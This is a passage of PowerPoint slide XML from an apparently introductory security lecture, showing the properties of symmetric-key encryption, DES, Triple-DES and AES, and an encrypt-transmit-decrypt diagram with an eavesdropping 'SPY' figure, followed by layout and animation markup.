                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can’t derive plain text from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (decode) without access to key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can’t derive key from plain text and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As long as password stays secret, get both secrecy and authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symmetric Key Algorithms: DES, Triple-DES, AES </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3490299" y="5233219"/>
            <a:ext cx="2133600" cy="1143000"/>
            <a:chOff x="2211" y="816"/>
            <a:chExt cx="1344" cy="720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037331" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2355" y="942"/>
              <a:ext cx="1091" cy="594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t>Insecure</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t>Transmission</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t>(ciphertext)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037329" name="Rectangle 17" descr="Dark downward diagonal"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2211" y="816"/>
              <a:ext cx="1344" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="dkDnDiag">
              <a:fgClr>
                <a:srgbClr val="00FFFF"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg1"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 42"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5542936" y="4776019"/>
            <a:ext cx="1143000" cy="1905000"/>
            <a:chOff x="3507" y="528"/>
            <a:chExt cx="720" cy="1200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037325" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3507" y="528"/>
              <a:ext cx="720" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="53FB25"/>
            </a:solidFill>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200"/>
                <a:t>Decrypt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037337" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3663" y="1503"/>
              <a:ext cx="417" cy="225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200"/>
                <a:t>Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037339" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3871" y="1215"/>
              <a:ext cx="0" cy="288"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 41"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2499699" y="4776019"/>
            <a:ext cx="1143000" cy="1881188"/>
            <a:chOff x="1587" y="528"/>
            <a:chExt cx="720" cy="1185"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037324" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1587" y="528"/>
              <a:ext cx="720" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="53FB25"/>
            </a:solidFill>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200"/>
                <a:t>Encrypt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037342" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="1488"/>
              <a:ext cx="417" cy="225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200"/>
                <a:t>Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037343" name="Line 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1936" y="1200"/>
              <a:ext cx="0" cy="288"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 39"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1645624" y="5263382"/>
            <a:ext cx="838200" cy="1417637"/>
            <a:chOff x="1049" y="835"/>
            <a:chExt cx="528" cy="893"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037335" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1049" y="835"/>
              <a:ext cx="528" cy="0"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1037344" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="881" y="1184"/>
              <a:ext cx="863" cy="225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200"/>
                <a:t>Plaintext</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 40"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6674824" y="5263382"/>
            <a:ext cx="838200" cy="1416050"/>
            <a:chOff x="4217" y="835"/>
            <a:chExt cx="528" cy="892"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037334" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4217" y="835"/>
              <a:ext cx="528" cy="0"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1037345" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="4049" y="1183"/>
              <a:ext cx="863" cy="225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="228600" indent="-228600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200"/>
                <a:t>Plaintext</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 44"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="518499" y="4547419"/>
            <a:ext cx="7996237" cy="1905000"/>
            <a:chOff x="339" y="384"/>
            <a:chExt cx="5037" cy="1200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 37"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="339" y="480"/>
              <a:ext cx="768" cy="1104"/>
              <a:chOff x="339" y="480"/>
              <a:chExt cx="768" cy="1104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1037320" name="Picture 8"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="339" y="480"/>
                <a:ext cx="768" cy="704"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1037347" name="Text Box 35"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="480" y="1344"/>
                <a:ext cx="471" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="228600" indent="-228600"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400"/>
                  <a:t>SPY</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 38"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4707" y="384"/>
              <a:ext cx="669" cy="1200"/>
              <a:chOff x="4707" y="384"/>
              <a:chExt cx="669" cy="1200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1037323" name="Picture 11"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4707" y="384"/>
                <a:ext cx="669" cy="864"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1037348" name="Text Box 36"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4802" y="1344"/>
                <a:ext cx="478" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="90478" tIns="44445" rIns="90478" bIns="44445">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="228600" indent="-228600"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400"/>
                  <a:t>CIA</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37315">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10373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3731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37315">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103731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373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037315">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103731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0373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037315">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">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0373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1037315">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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1037315">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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1037315">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>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1037315">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="66" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103731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2" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="74" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1037315">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
